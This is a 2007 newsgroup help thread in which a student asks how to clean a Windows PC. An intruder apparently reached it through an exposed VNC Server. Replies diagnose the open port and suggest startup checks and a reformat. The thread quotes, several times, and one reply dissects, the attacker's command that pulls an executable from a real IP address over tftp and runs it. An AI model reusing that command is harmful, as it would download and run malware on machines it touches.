Trojan from using VNC Viewer Software

[Matt]

Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

Kind regards,

Matt

 

[Spack]

Matt wrote on 30 Mar 2007 08:55:11 -0700:

Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

Kind regards,

Matt

This should have nothing to do with the Viewer, are you sure you didn't also
install the Server on your own machine and leave the port open to the
outside world? See http://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
for more info, basically someone/something is connecting to the VNC Server
on your machine bypassing the authentication, and then running the commands
(either manually or using a script, most likely using a script). I'm
guessing that when you downloaded and installed VNC Viewer you actually
download the full Client+Server package and installed both, and you allowed
VNC Server to listen in Zone Alarm, probably when it first ran and you
blindly hit the Allow button. Get your machine cleaned and uninstall VNC
Server - you do not need the server component to use the Viewer to access
another machine.

Dan

 

[Leythos]

Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

First, how do you know it's a trojan STILL on your system?

Did you reset the VNC connection password?

Did you change the default VNC Server port to something other than 5900?

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?



--
Want to know what PCBUTTS1 is really about?
*** WARNING - this links contains foul/pornographic content of an
abusive nature created by PCBUTTS1 and still hosted on his public
website ***
http://www.pcbutts1.com/downloads/leythos.htm

 

[Matt]

First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one) which has no such option

Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

 

[Matt]

This should have nothing to do with the Viewer, are you sure you didn't also

install the Server on your own machine and leave the port open to the
outside world? Seehttp://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
for more info, basically someone/something is connecting to the VNC Server
on your machine bypassing the authentication, and then running the commands
(either manually or using a script, most likely using a script). I'm
guessing that when you downloaded and installed VNC Viewer you actually
download the full Client+Server package and installed both, and you allowed
VNC Server to listen in Zone Alarm, probably when it first ran and you
blindly hit the Allow button. Get your machine cleaned and uninstall VNC
Server - you do not need the server component to use the Viewer to access
another machine.

You are absolutely right, I did install the full package and probably
did tell ZoneAlarm to let it have special prividedges. I will
uninstall it right away. The only problem is that I don't think I am
going to be able to "clean" ym computer, because after running all the
scans I mentioend above, none of them came up with anything.

Is their anything I can do aside from reformatting my computer to
ensure I get rid of this?

Kind Regards,

Matt

 

[Matt]

First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

 

[Default User]

Is their anything I can do aside from reformatting my computer to
ensure I get rid of this?

Use Autoruns to look for startup programs that you didn't authorize. Look
for any instances of DLL files being loaded on startup that are not
authorized. You can try looking in the System32 directory for recently
modified files, or hidden files that have random names like xzlk.dll, and
send the files found to http://www.virustotal.com/en/indexf.html for
analysis. You could also try running a spyware scanner like Spybot Search
& Destroy or SuperAntiSpyware; the later can detect files based on
characteristics like size, random file names, and other attributes that are
common among trojans and malware.

 

[Mr. Arnold]

Is their anything I can do aside from reformatting my computer to

ensure I get rid of this?

<http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

 

[Matt]

<http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

That makes for some interesting reading, looks like a reformat is the
only option.

Thanks to everyone for all the replies.

Kind Regards,

Matt

 

[Rick Merrill]

That makes for some interesting reading, looks like a reformat is the
only option.

There are exploits that modify the POST code and BIOS so that even
reformatting may not help :-( Is it time for a new computer???

 

[kurt wismer]

There are exploits that modify the POST code and BIOS so that even
reformatting may not help :-( Is it time for a new computer???

??? i've never heard of anything specifically modifying the power on
self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made
is to corrupt flashable bios, and that is rather noticable as it stops
the computer from booting...

so no, it's not time for a new computer yet...

 

[Sebastian Gottschalk]

That makes for some interesting reading, looks like a reformat is the
only option.

Yes and no.

Everything that restores your computer to a well-known safe state is an
option. If you have a verified backup, you can restore from that. You can
compare against a complete reference system. If you have a backup
containing a list of checksums of all system-relevant files, you can detect
the changes and selective restore these parts (or verify them as harmless
changes). You can boot a trusted system and verify all signed binaries and
just restore all relevant data files (Windows Registry and some other
databases, some INF and INI files, boot sector etc.).

But, if no such safe reference exists, the only well-known safe state is a
fresh install. Sadly, this is the most common case.

 

[Sebastian Gottschalk]

??? i've never heard of anything specifically modifying the power on
self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made
is to corrupt flashable bios, and that is rather noticable as it stops
the computer from booting...

so no, it's not time for a new computer yet...

Actually it's quite trivial to modify the BIOS (intentionally!), see what
the BIOS modder communities are achieving. It would be no problem to
implement such malware.

There have been extensive discussions about the default settings for
enabling flashing the BIOS as well as how well these actually work. If you
have a hardware-implemented switch, if it's set to disabled, and you flash
chip is not one of those old Intel or Amtel chips from before about 2001,
it shouldn't be possible to flash the BIOS.

 

[Matt]

??? i've never heard of anything specifically modifying the power on

self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made
is to corrupt flashable bios, and that is rather noticable as it stops
the computer from booting...

so no, it's not time for a new computer yet...

Well I formatted and reinstalled Windows a few days ago now and
everything seems to be running smoothly.

Thanks again for all the replies on this topic.

Kind regards,

Matt

 

[kingthorin]

<http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>

Well assuming your original post contains the only commands that were
run here's what we can figure out.

"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -
i
64.79.213.12 GET ktqjy.exe & start ktqjy& "

%comspec% is an environment variable on windows system which points to
the command prompt executable. We can verify this by launching a
command prompt and echo'ing the value to the screen, ie:
C:\Documents and Settings\someuser>echo %comspec%
C:\WINNT\system32\cmd.exe

Next we can see what the /c switch does for the command prompt
(cmd.exe), ie:
C:\Documents and Settings\someuser>cmd.exe /?
Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /
V:OFF]
[[/S] [/C | /K] string]

/C Carries out the command specified by string and then
terminates

Ok so /c carries out the commands provided when cmd.exe is called (via
%comspec%).

Next we see that he echo'd some useless junk to the
screen....Repairing....Please Wait, laaa deee daaaa.

Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
verify this by checking the command optionsn for tftp:

C:\Documents and Settings\someuser>tftp /?

Transfers files to and from a remote computer running the TFTP
service.

TFTP [-i] host [GET | PUT] source [destination]

-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.

So -i specifies binary transfer which is what he'd need for a
executable (exe).

Lastly he launches ktqjy.

ktqjy.exe should be sitting in whatever the default directory of your
command prompt is, something like "C:\Documents and Settings\someuser"
if you goto the start menu select run type cmd and hit ok it'll be
displayed on the screen. You can navigate to this directory in
explorer and delete the file. You may have to launch task manager and
"End Process" on it first. Also you should fire up msconfig (start:run
msconfig) and review all your startup items.

etc....

Just follow the information you have.

 

[Sebastian Gottschalk]

Lastly he launches ktqjy.

ktqjy.exe should be sitting in whatever the default directory of your
command prompt is, something like "C:\Documents and Settings\someuser"
if you goto the start menu select run type cmd and hit ok it'll be
displayed on the screen. You can navigate to this directory in
explorer and delete the file. You may have to launch task manager and
"End Process" on it first. Also you should fire up msconfig (start:run
msconfig) and review all your startup items.

etc....

Just follow the information you have.

In the meanwhile, ktqjy.exe has modified various system binaries, imposed
some kernel hooks such that killing just removes it from the list of
processed (but still keeps on running) and doesn't list the three other
copies of itself not any more, has downloaded 5 other binaries and executed
some, modified some system settings to open some obstrusive security
vulnerabilities to allow easier reinfection, ...

Oh, and it might have simply modified the previous history.

Short to say: You have no reliable information whatsoever.